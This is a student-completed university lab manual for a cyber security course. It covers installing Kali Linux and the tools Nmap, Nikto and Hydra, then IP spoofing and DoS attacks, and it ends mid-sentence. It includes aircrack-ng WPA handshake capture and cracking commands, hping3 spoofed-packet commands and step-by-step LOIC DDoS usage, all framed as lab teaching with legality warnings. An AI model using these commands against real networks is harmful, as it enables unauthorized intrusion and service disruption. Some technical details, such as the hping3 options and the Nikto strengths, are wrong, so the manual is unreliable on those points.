A Laboratory Manual for

Cyber Security
(3150714)

B.E. Semester 5
(Computer Science Engineering)

Directorate of Technical Education, Gandhinagar,

Gujarat
 Government Engineering College, Patan

Certificate

This is to certify that Mr. T a n d e l P r i y a n s h u N a r e s h b h a i Enrollment

No. 220220131133 of B.E. Semester 5th Information Technology of this Institute
(GTU Code: 022) has satisfactorily completed the Practical / Tutorial work for
the subject Cyber Security (3150714) for the academic year 2024-25.

Place:
Date:

Head of the Department Name and Sign of Faculty member

Cyber Security (3150714)

Preface

Cyber security is the technology and process that is designed to protect networks and devices
from attacks, damage, or unauthorized access. Cyber security is essential for a country’s military,
hospitals, large corporations, small businesses, and other organizations and individuals since data
is now the cornerstone of any organization.

The cyber security practical lab manual is a guide for students who want to learn and practice
various aspects of cyber security in a realistic and hands-on manner. The manual provides a set
of experiments, simulations, tests, and projects related to cyber security that cover various topics
such as cryptography, network security, web security, malware analysis, penetration testing, etc.

The manual consists of several chapters, each containing a brief introduction to the topic, a list of
objectives, a description of the required tools and software, a step-by-step procedure for
conducting the experiment or project, some questions for self-assessment or discussion, and some
references for further reading.

One of the objectives of this cyber security practical lab manual is to help students understand the
cyber laws that govern and protect cyberspace. Cyber laws are the legal framework that regulates
and protects cyberspace from cyber threats. Cyber laws aim to prevent, detect, and punish
cybercrimes and to promote cyber security awareness and best practices among users.

The manual is intended for the third-year students of the Information Technology branch in the
subject of cyber security. The manual assumes that the students have some basic knowledge of
computer networks, operating systems, programming languages. The manual also assumes that
the students have access to a cyber security laboratory that provides a realistic network
environment with various devices and software.

The manual aims to provide a stimulating and engaging learning experience for students who
want to pursue a career or further education in cyber security. The manual also hopes to inspire
students to contribute to the advancement of cyber security knowledge and practice in the society.
Cyber Security (3150714)

Practical – Course Outcome matrix

Course Outcomes:
1. Describe system and web vulnerability.
2. Evaluate network defense tools.
3. understand the cyber laws.
4. investigate cybercrime, prepare report, and apply laws for the case.

Sr. CO CO CO CO
Objective(s) of Experiment
No. 1 2 3 4
Install Kali Linux. Examine the utilities and tools
1. √ √
available in Kali Linux and Analyze 5 tools.
Evaluate network defense tools for following.
2. √ √
(i) IP spoofing (ii) DOS attack
Explore the Nmap tool and list how it can be used for
3. √
network defense.

4. Explore the NetCat tool. √ √

5. Use Wireshark tool and explore the packet format. √ √

Examine SQL injection attack. Perform SQLinjection

6. √ √
with SQLMap on vulnerable websites.
Examine software keyloggers and hardware
7. √ √
keyloggers
Perform online attacks and offline attacks of password
8. √ √
cracking
Consider a case study of cybercrime, where the
attacker has performed online credit card fraud.
9. √ √
Prepare a report and list the laws that will be
implemented on attacker
Cyber Security (3150714)

Industry Relevant Skills

The following industry relevant competency is expected to be developed in the student by

undertaking the practical work of this laboratory.
1. Knowledge: Students are expected to acquire knowledge of various concepts and
principles of cyber security, such as cryptography, network security, web security,
malware analysis, penetration testing, etc. Students are also expected to acquire the
knowledge of various cyber laws and regulations that govern and protect cyberspace.
2. Skills: Students are expected to develop the skills and techniques to identify, analyze,
and mitigate cyber risks and vulnerabilities. Students are also expected to develop the
skills and techniques to use various tools and software to perform cyber security tasks,
such as encryption, authentication, scanning, etc.
3. Attitude: Students are expected to develop a positive attitude towards cyber security
and its importance in the digital world. Students are also expected to develop a sense
of responsibility and ethics in cyberspace. Students are also expected to develop a habit
of continuous learning and updating their knowledge and skills in cyber security.

Guidelines for Faculty members

• Faculty members should ensure that they have adequate knowledge and skills in cyber
security and its related topics. Faculty members should also keep themselves updated
with the latest developments and trends in cyber security.
• Faculty members should prepare and plan the practical sessions in advance and ensure
that the required tools and software are available and working properly. Faculty
members should also ensure that the laboratory environment is safe and secure for the
students and the equipment.
• Faculty members should explain the objectives, outcomes, and procedures of each
experiment or project clearly and concisely to the students. Faculty members should
also demonstrate the steps and techniques involved in each experiment or project to the
students.
• Faculty members should supervise and monitor the students’ progress and performance
during the practical sessions. Faculty members should also provide guidance, feedback,
and support to the students as and when required. Faculty members should also
encourage the students to ask questions and clear up their doubts.
• Faculty members should evaluate the students’ work and results based on predefined
criteria and rubrics. Faculty members should also provide constructive feedback and
suggestions for improvement to the students. Faculty members should also appreciate
and acknowledge the students’ efforts and achievements.
• Faculty members should promote a culture of cyber security awareness and best
practices among the students. Faculty members should also instill a sense of
responsibility and ethics in cyberspace among the students. Faculty members should
also motivate and inspire the students to pursue a career or further education in cyber
security.
Cyber Security (3150714)

Instructions for Students

• Students should read and understand the objectives, outcomes, and procedures of each
experiment or project before starting the practical session. Students should also prepare and
review the required tools and software for each experiment or project.
• Students should follow the instructions and guidelines given by the faculty members during
the practical session. Students should also perform the steps and techniques involved in each
experiment or project carefully and accurately. Students should also record their
observations and results properly and systematically.
• Students should ask questions and clear their doubts with the faculty members or their peers
during the practical session. Students should also seek guidance, feedback, and support from
the faculty members or their peers as and when required. Students should also share their
knowledge and skills with their peers.
• Students should submit their work and results to the faculty members for evaluation within
the stipulated time. Students should also accept and implement the feedback and suggestions
given by the faculty members for improvement. Students should also learn from their
mistakes and achievements.
• Students should follow cyber security best practices and standards while performing cyber
security tasks. Students should also respect the rights and privacy of others in cyberspace.
Students should also avoid any unethical or illegal activities in cyberspace.
• Students should develop an interest and passion for cyber security and its related topics.
Students should also update their knowledge and skills in cyber security regularly. Students
should also explore career or further education opportunities in cyber security.

Common Safety Instructions

1. Students are expected to be too careful.
2. Students should wear appropriate clothing and footwear while working in the laboratory.
Students should also avoid wearing loose or dangling accessories that may get caught in the
equipment.
3. Students should handle the equipment and devices with care and caution. Students should
also avoid touching any wires or cables that may be alive or hot. Students should also switch
off and unplug the equipment and devices when not in use or when leaving the laboratory.
4. Students should keep the laboratory clean and tidy. Students should also dispose of any
waste materials properly and safely. Students should also report any spills, leaks, or damages
to the faculty members or the laboratory staff immediately.
5. Students should follow the emergency procedures in case of any fire, electric shock, injury,
or other accidents. Students should also know the location and use of the fire extinguishers,
first aid kits, and emergency exits in the laboratory.
6. Students should respect the laboratory rules and policies. Students should also cooperate and
communicate with the faculty members, the laboratory staff, and their peers in the
laboratory. Students should also avoid any disruptive or dangerous behavior in the
laboratory.
 Cyber Security (3150714)

Index
(Progressive Assessment Sheet)

Sr. Objective(s) of Experiment Page Date of Date of Assessme Sign. of Remar

No. No. perform submiss nt Teacher ks
ance ion Marks with date
1 Install Kali Linux. Examine the utilities and
tools available in Kali Linux and Analyze 5
tools.
2 Evaluate network defense tools for following.
(i) IP spoofing (ii) DOS attack
3 Explore the Nmap tool and list how it can be
used for network defense.
4
Explore the NetCat tool.

5 Use Wireshark tool and explore the packet

format.
6 Examine SQL injection attack. Perform
SQLinjection with SQLMap on vulnerable
websites.
7 Examine software keyloggers and hardware
keyloggers
8 Perform online attacks and offline attacks of
password cracking
9 Consider a case study of cybercrime, where
the attacker has performed online credit card
fraud.
Prepare a report and list the laws that will be
implemented on attacker
Total
Cyber Security (3150714)

Experiment No: 1

Install Kali Linux. Examine the utilities and tools available in Kali Linux and
Analyze 5 tools.
Date:

Competency and Practical Skills: Students will be able to install and use Kali Linux, a popular
operating system for cyber security professionals and ethical hackers. Students will also be able
to explore and study various utilities and tools available in Kali Linux for performing different
cyber security tasks.

Relevant CO:
1. Describe system and web vulnerability.
2. Evaluate network defense tools.

Objectives:

a. To introduce students to Kali Linux, a popular operating system for cyber security professionals
and ethical hackers.
b. To enable students to install and use Kali Linux on a virtual machine or a physical machine.
c. To familiarize students with the basic settings and preferences of Kali Linux.
d. To teach students how to update and upgrade the Kali Linux system and its packages.
e. To help students navigate and use the graphical user interface (GUI) and the command-line
interface (CLI) of Kali Linux.
f. To provide students with Kali Linux documentation and help resources.
g. To expose students to the utilities and tools available in Kali Linux for different cyber security
tasks.
h. To train students how to use five tools of their choice from different categories for performing
cyber security tasks.

Equipment/Instruments: Computer, Internet

Introduction

Kali Linux is a free and open-source Linux-based operating system that is designed for advanced
Penetration Testing and Security Auditing. It contains several hundred tools for various Information
Security tasks, such as Penetration Testing, Security Research, Computer Forensics, Reverse Engineering,
Vulnerability Management and Red Team Testing. It was developed by Mati Aharoni and Devon Kearns
of Offensive Security. Kali Linux is a multi-platform solution that can be used by information security
professionals and hobbyists.

Advantages:
• It has 600+ Penetration testing and network security tools pre-installed.
• It is completely free and open source. So, you can use it for free and even contribute for its
development.
Cyber Security (3150714)

• It supports many languages.

• Great for those who are intermediate in Linux and have their hands on Linux commands.
• Could be easily used with Raspberry Pi.

Disadvantages:

• It is not recommended for those who are new to Linux and want to learn Linux. (As it is
Penetration Oriented)
• It is a bit slower.
• Some software may malfunction.

Why Kali Linux?

If an individual is into penetration testing or cybersecurity in general, you'll appreciate that Kali Linux
already has the specialized tools you'll need installed and configured. Also, if you're curious about any
security-related problems in a program or website, Kali Linux is an excellent choice.

There is a common misconception that Kali may be used to break into user accounts or servers. One of
the most widespread misconceptions regarding Kali Linux is this. Kali Linux is essentially a specialized
version of Debian that includes a suite of security and network administration utilities. This is a weapon
for self-defense or self-training only. Kali Linux's primary target audience is IT specialists. Those
interested in Penetration Testing, Cyber Security, or Ethical Hacking will find this book useful. It is a
potent instrument, and its application could result in financial losses.

Installation Steps

There are various methods available for the installation of Kali Linux. The OS can be installed directly
onto the computer or through a Virtual Machine (VM). If you wish to install the it directly onto your
computer you will need USB stick, Kali Linux ISO and Rufus to make it bootable USB drive. For VM
installation you require VirtualBox software and Kali Linux ISO. Installation steps for methods will
remain the same.

1. System Requirements:
a. A Computer (Minimum Requirements: 20GB Hard Disk space, 2GB RAM, Intel Core i3
or AMD E1 equivalent)
2. Installation Prerequisite
a. USB stick (6 GB or More)
b. Kali Linux ISO file (https://www.kali.org/)
c. Rufus (To create Bootable Drive - https://rufus.ie/en/)
d. If Kali Linux will be installed in the Virtual Machine than make sure Virtual Box
software (https://www.virtualbox.org/) are installed.
3. Creating a New VM
Once you have downloaded the installation image, you can create a new VM. Open VirtualBox and
create a new VM (Machine > New or Ctrl+N) on which Kali Linux will be installed.
Cyber Security (3150714)

Set the following VM parameters:

Name: Kali_x64
Machine Folder: C:\Virtual\VirtualBox (This path is used only for demo purpose. Try not to use a
system partition to store VMs).
Type: Linux
Version: Debian (64-bit)
Memory size: 4096 MB. The VM memory size must be large enough to run a guest OS, though you
should leave enough unallocated memory to run your host OS. In the current example, a host machine
with 16 GB of RAM is used, which provides enough memory left for a host OS.
Hard disk: Create a virtual hard disk now.
Hit Create to continue and configure a new virtual hard disk.
Cyber Security (3150714)

Set the virtual disk file location, for example C:\Virtual\VirtualBox\Kali_x6Kali_x64.vdi

It is recommended that you store virtual disk files in the VM folder (such folder is selected by default).

Set the virtual disk file size. It should be at least 20 GB.

Hard disk file type: VDI. A native VirtualBox format is selected.

Storage on physical disk: Dynamically allocated.
Click Create to finish creating a new VM.
Cyber Security (3150714)

After creating a new VM, some additional settings must be configured. Select your recently created
virtual machine and open the VM settings.
Cyber Security (3150714)

Display options
Go to Display > Screen and set Video Memory to 128 MB. It will prevent installer hanging.
Next, tick the checkbox Enable 3D acceleration (optional). It will be useful for applications that need
3D acceleration.

Network options
Next, go to the network settings and select the networking mode of the virtual network adapter of the
VM. Let’s select the Bridged mode to use the VM network adapter much as you would for a physical
network adapter of the host machine. In this case, the VM network adapter is connected to the same
physical network as the host machine. You can set additional options such as network adapter name,
type, MAC address etc.
Cyber Security (3150714)

Boot options

You must insert your virtual ISO DVD image to a virtual DVD drive of the VM and then boot a virtual
machine from that ISO disk. In the VM settings, go to Storage, select an IDE controller of your virtual
optical drive (it is empty by default). Click the empty status, then click the disc icon near IDE Secondary
Master and in the opened menu, select Choose Virtual Optical Disk File. Browse the Kali Linux
installation ISO image that you have downloaded from the official site before (kali-linux-2019.2-
amd64.iso). Hit OK to save settings.
Cyber Security (3150714)

4. Start Installation

Now you can start your new VM (Kali_x64 in this case) and begin the Kali installation.

After booting from a virtual DVD, you will see a boot menu where you can select boot options for Kali
Linux such as Boot from Live DVD, Install, Graphical Install etc. Let’s select Graphical Install.
Press Enter to continue.
Cyber Security (3150714)

5. Select a language. Choose the language you wish to use for the installation process and the
installed system. English is selected for the current installation. Click the Continue button on
each screen to move forward.
Cyber Security (3150714)

6. Select your location. This option is used to set your time zone, time format, etc. United States
has been selected in the current example.
Cyber Security (3150714)

7. Configure the keyboard. Select your keyboard layout. American English is used for the current
installation.
Cyber Security (3150714)

8. Configure the network. Enter the hostname for your Linux system, for example, kali-
virtualbox.
Cyber Security (3150714)

9. Configure the domain name. If you don’t use a domain in your network, you may leave this
field empty.

10. Set up users and passwords. Read the useful tips on this screen and enter the password for root.
Cyber Security (3150714)

11. Configure the clock. Now you can select a precise time zone for your country.
Cyber Security (3150714)

12. Partition disks. You can use manual and guided partitioning of disks. For the first time, you can
select Guided – use entire disk. The entire disk will be used for creating one big partition.

Confirm that you want to erase the disk. There is no reason to worry, as in this case, the empty 20-GB
virtual disk is used for partitioning.

Select a preferred partitioning scheme for your virtual disk. Let’s select All files in one partition.
Cyber Security (3150714)

Check the overview and select Finish partitioning and write changes to disk.

Select Yes and confirm that you would like to write changes to the disk.

13. Wait for the system to be installed. As Kali Linux is being installed, the files are being copied to
the virtual disk of the VM.
Cyber Security (3150714)

14. Configure the package manager. Click Yes if you would like to use a network mirror. Selecting
this option will allow you to install or update application packages from online software
repositories.

Enter the information about your proxy server if you use a proxy server for internet access from your
network. There is no proxy server in this example; so this field is left empty.
Cyber Security (3150714)

15. Install the GRUB boot loader on a hard disk. Since there is no other operating systems and
boot loaders on a virtual disk, it is necessary to install GRUB in this case. Select Yes to install
GRUB.

Select a disk to which GRUB must be installed. In this case, /dev/sda is the necessary disk and is the
only disk connected to a VM.

16. Finish the installation. When the installation of Kali Linux on VirtualBox is complete, you will
see a notification message. Now you can reboot the virtual machine to boot the Kali Linux
installed on the VirtualBox VM.
Cyber Security (3150714)

After the reboot, you will see a login screen of Kali Linux. Enter root as a username, then enter the
password set during installing Kali Linux on VirtualBox to sign in.

Now you should see the Gnome Desktop of Kali Linux installed on your VirtualBox virtual machine.

Once installation is completed then open the terminal and type “sudo apt-get update”. It will update the
Cyber Security (3150714)

repositories. Make sure that you are connected to the internet There after various drivers can be installed
on Kali Linux. Please refer how to install drivers in Kali Linux. https://www.nakivo.com/blog/how-to-
install-kali-linux-on-virtualbox/)

Popular Stress Testing Tools in Kali Linux:

1. Aircrack-ng
2. Burpsuite
3. Crackmapexec
4. Hydra
5. Johntheripper (jtr)
6. Metasploit
7. Nmap (Network Mapper)
8. Responder
9. Sqlmap
10. Wireshark

1. Aircrack-ng

Introduction to Aircrack-ng

Aircrack-ng is a tool that comes pre-installed in Kali Linux and is used for Wi-Fi network security and
hacking. Aircrack is an all-in-one packet sniffer, WEP and WPA/WPA2 cracker, analyzing tool and a
hash capturing tool. It is a tool used for Wi-Fi hacking. It helps in capturing the package and reading the
hashes out of them and even cracking those hashes by various attacks like dictionary attacks. It supports
almost all the latest wireless interfaces.
It mainly focuses on 4 areas:

Monitoring: Captures cap, packet, or hash files.

Attacking: Performs de-authentication or creates fake access points
Testing: Checking the Wi-Fi cards or driver capabilities
Cracking: Various security standards like WEP or WPA PSK.

Strength and Weakness

Strengths
• A famous hacker tool that you can use for nothing.
• Versions for Windows as well as Unix, Linux, and macOS
• Already installed in Kali Linux
• Can crack wireless network encryption.
Weakness
• Difficult to install.
• Difficult to use.
• No graphical user interface
• Excels at cracking WEP encryption, which is no longer used on wireless systems.
• The WPA-TKP utilities don’t work.
Cyber Security (3150714)

Working with aircrack-ng

1. To list all network interfaces.

airmon-ng
This command will return all the network interfaces available or connected to the system.

2. Stopping the desired network interface.

airmon-ng stop wlan0mon
To stop a network interface enter the above command and replace “wlan0” with the desired network
interface.

3. Starting a network interface at a specific channel.

airmon-ng start wlan0 10
To start a network interface at a specific channel enter the above command and replace “ wlan0” with
the desired network interface and 10 with the desired channel name.
Cyber Security (3150714)

3. Collecting authentication handshake

airodump-ng -c 10 --bssid 00:15:5D:9C:44:00 -w psk wlan0

To collect the authentication handshake, enter the above command in terminal and replace “wlan0”
with the desired network interface and 10 with the desired channel name and bssid with the bssid of
the wifi.

5. Cracking the captured handshake file by means of a wordlist

aircrack-ng -w wordlist psk*.cap
Cyber Security (3150714)

To run a brute force attack and to crack the password enter the above command in the terminal and replace
“wordlist” with the desired wordlist to be used and “wpa.cap” with the desired handshake filename.

6. To get the help section of the tool

aircrack-ng --help
The above command will display the help section of the aircrack-ng command.
Cyber Security (3150714)

7. To display the # of CPUs and SIMD support

aircrack-ng -u
The above command will display the details of the hash of CPUs and SIMD support.
Cyber Security (3150714)

WRITE ABOUT TOOLS, ATLEAST 5 TOOLS USED BY CYBER SECURITY EXPERTS.

PLEASE TAKE REFERENCE OF ABOVE AIRCRACK-NG TOOL

Study of Tool

• A network scanner used to discover hosts, services, and vulnerabilities on a network.

• Nmap is Linux command-line tool for network exploration and security auditing.
• This tool is generally used by hackers and cybersecurity enthusiasts and even by network and system administrators .
• It is used for the following purpose:
• Real time information of a network
• Detailed information of all the IPs activated on your network
• Number of ports open in a network
• Provide the list of live host
• Port , OS and Host scanning

Strengths of Nmap:
Nmap is a versatile, accurate, and fast network scanning tool with a wide range of features and options.
It can be used to discover hosts, services, and vulnerabilities on a network, and is a valuable tool for network
administrators, security professionals, and system engineers.

Weaknesses of Nmap:
Nmap can be detected by firewalls and intrusion detection systems (IDS),
which can prevent it from scanning certain networks or hosts. Additionally,
Nmap may produce false positives, which can lead to unnecessary investigations or alerts.

Example:
• Scan using Hostname:
• Scan using IP Address:
Cyber Security (3150714)

Study of Tool

Nikto:

• Nikto is an open-source web server scanner which performs comprehensive tests

against web servers like Apache, Nginx, HIS, OHS, Litespeed, and so on.
• Nikto can check for server configuration items such as the presence of multiple index
files, HTTP server options, and will attempt to identify installed web servers and
software.

Strengths of Nikto:

• Limited to web servers

• May miss some vulnerabilities
• Can trigger false positives
• Can be detected by firewalls

• Weaknesses of Nikto:

• Limited to web servers

• May miss some vulnerabilities
• Can trigger false positives
• Can be detected by firewalls
Cyber Security (3150714)

Example:
• Scanning website

Hydra:
• Hydra is one of the most powerful open-source password-cracking programs available in Kali Linux.
• It is used for dictionary attacks and brute-forcing.
• It can brute-force by sending multiple login requests very rapidly to a variety of network protocols,
services, websites, and web applications.
• It can support more than 50 network protocols and services like Telnet, SSH, HTTP, HTTPS, RDP, SMTP, FTP, etc.

• Strength of Hydra:

• Supports a wide range of protocols (FTP, SSH, Telnet, HTTP, SMB, etc.)
• Supports various hashing algorithms (MD5, SHA1, NTLM, etc.)
• Fast and efficient
• Customizable
• Easy to use
• Free and open-source

• Weaknesses of Hydra:
• Can be detected by intrusion detection systems (IDS)
• May take a long time to crack strong passwords
• Can be computationally intensive
• Requires a dictionary or brute force list
• May not be effective against multi-factor authentication (MFA)
Cyber Security (3150714)
 Cyber Security (3150714)

• In above figure it is shown the output of Hydra working.

• Once the hydra tool brute forces the correct username and password for
the target domain, the execution will get stopped and the cracked username and password will
be shown in the terminal itself.
• In above screenshot. We can see that we have created the target
login page and got the login details of the domain.
Cyber Security (3150714)

Conclusion

In conclusion, this experiment introduced students to Kali Linux, a powerful tool for
cybersecurity professionals and ethical hackers. By installing and exploring the operating system,
students gained hands-on experience with its various utilities and tools. They learned to
navigate the system, update packages, and understand the use of key tools for
cyber security tasks, enhancing their ability to detect and prevent system
vulnerabilities and strengthen network defense.

Quiz:
1. What is the name of the website where you can download the Kali Linux ISO file?
a) kali.org
b) kali.com
c) kali.net
d) kali.io

What tool can you use to create a bootable USB drive with Kali Linux?
a) Rufus
b) Etcher
c) UNetbootin
d) Any of the above

What is the minimum amount of RAM recommended for installing Kali Linux with the default Xfce4 desktop and
the kali-linux-default metapackage?
a) 128 MB
b) 512 MB
c) 2 GB
d) 8 GB

What setting do you need to disable in your UEFI settings before installing Kali Linux?
a) Fast Boot
b) Secure Boot
c) Legacy Boot
d) Boot Order

What are the two options for starting the installation of Kali Linux from the boot screen?
a) Graphical install or Install (Text-Mode)
b) Live install or Install (Command-Line)
c) Standard install or Install (Advanced)
d) Basic install or Install (Custom)
Cyber Security (3150714)

Suggested Reference:

1. https://www.kali.org/
2. https://www.nakivo.com/blog/how-to-install-kali-linux-on-virtualbox/
3. https://rufus.ie/en/
4. https://www.virtualbox.org/
5. https://www.kali.org/tools/aircrack-ng/

References used by the students: (Sufficient space to be provided)

https://www.geeksforgeeks.org/crack-web-based-login-page-with-hydra-in-kali-linux/
Cyber Security (3150714)

Rubric wise marks obtained:

Criateria 1 2 3 4 5 Total
Marks

Faculty Signature
Cyber Security (3150714)

Experiment No: 02

Evaluate network defense tools for following.

Date:
(i) IP spoofing (ii) DOS attack

Competency and Practical Skills:

Relevant CO: Evaluate network defense tools.

Objectives:
• To understand what IP spoofing and DoS attack are and how they are used to launch attacks on a
network.
• To learn about the different types of IP spoofing attacks and how they can be detected and
prevented using network defense tools.
• To compare the effectiveness of various network defense tools against IP spoofing and DoS
attacks, such as packet filtering, ingress filtering, egress filtering, encryption, authentication, and
anomaly detection.
• To apply the network defense tools to a simulated network environment and test their performance
against IP spoofing and DoS attacks using different attack scenarios and parameters.
• To evaluate the results of the network defense tools and analyze their strengths and weaknesses
against IP spoofing and DoS attacks.

Equipment/Instruments: Computer with Internet

Theory

What is IP Spoofing?
IP Spoofing is a technique used by attackers to forge the source IP address of a packet in order to
impersonate another system, deceive the recipient, and gain unauthorized access to a network. The attacker
modifies the packet header to make it appear as if it was sent from a trusted source, such as a legitimate
user, device or server on the network.

By using IP spoofing, the attacker can hide their identity, bypass security mechanisms that rely on source
IP addresses for access control, and launch various types of attacks, such as distributed denial-of- service
(DDoS) attacks, network reconnaissance, and data theft.

IP spoofing is possible because the Internet Protocol (IP) does not provide authentication or integrity
protection for the source address field. As a result, it is relatively easy for an attacker to manipulate the
source IP address of a packet using various tools and techniques, such as packet crafting, network
scanners, and software-defined networking (SDN) controllers.

To mitigate IP spoofing, various countermeasures have been developed, including access control lists
(ACLs), ingress filtering, and packet filtering. These mechanisms verify the authenticity of the source IP
address of incoming packets and drop any packet that has a spoofed address.
Cyber Security (3150714)

How does it work?

IP Spoofing can be performed using several techniques, depending on the attacker's goals and the
complexity of the network infrastructure. Here are some common methods:

• Blind Spoofing: In this technique, the attacker sends packets to the target system without receiving
any feedback from it. The attacker sends a packet with a spoofed source IP address and waits for
the target to respond to the fake address. Since the attacker cannot receive the response from the
target, this technique is also called "one-way communication".

• Non-blind Spoofing: In this technique, the attacker sends packets to the target and receives
feedback from it. The attacker sends packets with a spoofed source IP address and waits for the
target to respond to the fake address. The attacker intercepts the response and sends it back to the
original sender. This technique is also called "two-way communication".

• Man-in-the-middle (MitM) Spoofing: In this technique, the attacker intercepts the

communication between two systems and modifies the packets before forwarding them to their
intended destination. The attacker sets up a fake system that pretends to be the legitimate
destination system and sends packets to the source system with a spoofed source IP address. The
attacker also sends packets to the legitimate destination system with a spoofed source IP address
of the source system. This way, the attacker can intercept and modify the packets without being
detected.

• Distributed Spoofing: In this technique, multiple systems are used to perform IP Spoofing. The
attacker infects many systems with malware and uses them as a botnet to send packets with spoofed
source IP addresses. This technique is commonly used in DDoS attacks, where many systems are
used to overwhelm a target system with traffic.

It is important to note that IP Spoofing can be difficult to detect and prevent, especially if the attacker uses
sophisticated techniques and tools. Therefore, it is crucial to implement network security measures, such
as packet filtering and ingress filtering, to prevent unauthorized access and protect against IP Spoofing
attacks.

What tools are available to perform IP Spoofing in Kali Linux?

There are several tools available in Kali Linux that can be used to perform IP Spoofing. Here are some
commonly used tools are Hping3, Nmap and Scrapy.

It is important to note that using these tools for malicious purposes is illegal and unethical. They should
only be used for ethical hacking, network security testing, and educational purposes. Additionally, IP
Spoofing can be harmful and cause disruptions to the network, so it should be used with caution and only
with proper authorization and permission.

1. Hping3: Hping3 is a command-line packet crafting and network scanning tool that can be used to
perform various types of network attacks, including IP Spoofing. It allows you to send custom packets
with a spoofed source IP address to a target system and monitor the response.
Cyber Security (3150714)

• How to Install Hping3

Command: sudo apt-get install hping3

• Hping3 Help Command

Command: hping3 –help or hping3 –h
Above command will open the Help menu for Hping3. I will contain various parameters for this
software.
Cyber Security (3150714)

• How to send Specific no of Packets

Command: hping3 -c 4 192.168.254.130
Above command will send 4 packets to specified IP address
Cyber Security (3150714)

The hping3 -c command is used to specify the number of packets to send using hping3. The -c option
followed by a number specifies the count of packets to be sent.

For example, to send 10 TCP packets to a target IP address using hping3, the following command can be
used:

Command: sudo hping3 -S -c 10 <target IP>

In this command, the -S option specifies that the packets should be TCP SYN packets, and the -c 10 option
specifies that 10 packets should be sent to the target IP address.

Similarly, to send a single UDP packet with a spoofed source IP address and a source port number of 53
using hping3, the following command can be used:

sudo hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53

In this command, the -c 1 option specifies that only one UDP packet should be sent to the target IP address.

It is important to note that using the hping3 -c command for malicious purposes is illegal and unethical. It
should only be used for ethical hacking, network security testing, and educational purposes. Additionally,
IP Spoofing can be harmful and cause disruptions to the network, so it should be used with caution and
only with proper authorization and permission.

• How to Send UPD Packets:

Command: hping3 --udp 192.168.254.130 -c 4

Above Command will send 4 UDP packets to the mentioned IP address.
Cyber Security (3150714)

The hping3 --udp command is used to send User Datagram Protocol (UDP) packets using the hping3 tool.
Here is an example of how to use the hping3 --udp command:

Command: sudo hping3 -2 -s 53 -a <spoofed IP> -c 1 <target IP> --udp -p 53

In this example, the -2 option specifies that the packet should be a raw IP packet, the -s 53 option specifies
the source port number as 53 (which is commonly used for DNS), the -a option specifies the spoofed IP
address, the -c 1 option specifies that only one packet should be sent, the --udp option specifies that the
packet should be a UDP packet, and the -p 53 option specifies the destination port number as 53.

This command will send a single UDP packet to the target system with a spoofed source IP address and a
source port number of 53. The destination IP address and port number are specified by the <target IP> and
-p 53 options, respectively.

It is important to note that using the hping3 --udp command for malicious purposes is illegal and unethical.
It should only be used for ethical hacking, network security testing, and educational purposes.
Additionally, IP Spoofing can be harmful and cause disruptions to the network, so it should be used with
caution and only with proper authorization and permission.

How to Prevent IP Spoofing?

There are several ways to prevent IP Spoofing attacks. Here are some of the most effective methods Packet
Filtering, Ingress Filtering, Network Address Translation, Encryption, IDS or IPS, implement Best
Practices. Commonly used packet filtering tools in Kali Linux are iptables, nftables, ufw, firewalld.

ufw (Uncomplicated Firewall) is a frontend for iptables that provides a simpler and easier-to-use
interface for configuring firewall rules in Ubuntu-based systems, including Kali Linux. Here are some
basic commands to use ufw:
Cyber Security (3150714)

1. Enable or disable ufw:

To enable ufw, run the following command:
sudo ufw enable

To disable ufw, run the following command:

sudo ufw disable

2. Allow or deny incoming or outgoing traffic:

To allow incoming traffic on a specific port, run the following command:

sudo ufw allow <port>/<protocol>

For example, to allow incoming TCP traffic on port 22 (SSH), run the following command:
sudo ufw allow 22/tcp

To deny incoming traffic on a specific port, run the following command:

sudo ufw deny <port>/<protocol>

For example, to deny incoming UDP traffic on port 53 (DNS), run the following command:
sudo ufw deny 53/udp

To allow outgoing traffic to a specific IP address or network, run the following command:
sudo ufw allow out to <IP address or network>

For example, to allow outgoing traffic to the IP address 192.168.1.100, run the following command:
sudo ufw allow out to 192.168.1.100

To deny outgoing traffic to a specific IP address or network, run the following command:
sudo ufw deny out to <IP address or network>

For example, to deny outgoing traffic to the IP address 192.168.1.100, run the following command:
sudo ufw deny out to 192.168.1.100

3. Check the status of ufw:

To check the status of ufw, run the following command:
sudo ufw status

This command will show the current status of ufw and the firewall rules that are currently in effect.

These are some basic commands for using ufw in Kali Linux. There are many other options and features
available in ufw that you can explore by reading the documentation or running ufw --help.

What is DoS Attack

A DoS (Denial of Service) attack is a type of cyberattack in which an attacker tries to make a website,
computer system, or network unavailable to its users by overwhelming it with traffic or requests. This is
typically done by flooding the targeted system with traffic or requests until it is unable to respond to
Cyber Security (3150714)

legitimate traffic, effectively making it unavailable to users.

There are several types of DoS attacks, including:

• SYN Flood Attack: This type of attack exploits the way TCP/IP protocols establish a connection
between two devices by sending many connection requests to the target server, but never
completing the connection.

• UDP Flood Attack: This attack targets the target server with a large volume of User Datagram
Protocol (UDP) packets with invalid IP addresses, which ultimately floods the target server.

• Ping of Death Attack: This attack sends an oversized ping packet to a target server, causing it to
crash or become unavailable.

• Smurf Attack: This attack exploits the Internet Control Message Protocol (ICMP) and sends many
ICMP echo request packets to the broadcast address of a network, which results in a flood of replies
overwhelming the target server.

DoS attacks are usually carried out with the aim of causing disruption or damage to the target system or
network, and can have serious consequences, such as lost revenue, reputational damage, and even legal
liability in some cases.

What are the tools available to perform DoS/DDoS attack?

Most commonly tools used for DoS attacks are following.

• Low Orbit Ion Canon (LOIC)
• High Orbit Ion Canon (HOIC)
• Slowloris
• R.U.D.Y (R-U-DEAD-Yet)

NOTE: to perform a DoS attack or any other malicious activity on any Live server or Devices, such
actions are illegal and can result in severe consequences, including fines and imprisonment. Please
use this tool under the supervision of faculty in lab environments.

Step 1: Downloading LOIC (low orbit ion cannon)

Download Loic from sourceforge.net. You will get warnings from antivirus saying that it is a malicious
tool etc. The reason being that it is a DDOS tool. Obviously, you will get errors. Extract the zip file. And
run the software.

Step 2: Run LOIC

Cyber Security (3150714)

You will see the below menu, which shows all the options for DDoS attack.

Step 3: Setting Up and Starting DDOS attack

There are many options that you can configure with LOIC. You can select an IP or a URL as the target.

You can select the type of data you want to send along with the message:

You can also configure the port as well as the number of threads. As well as the speed of the DDOS
attack

Once you have configured everything, click on the following button:

Cyber Security (3150714)

IMMA CHARGIN MAH LAZER (I’m charging my laser)

Now you can see the status of the attack in the status section:

How does the LOIC work?

As you can see from the above demo, the tool works by flooding the target server with TCP, UDP, or
HTTP packets with the goal of overloading the service. One hacker using the LOIC cannot generate
enough traffic to make a serious impact on a target; However, some hackers use botnets collected
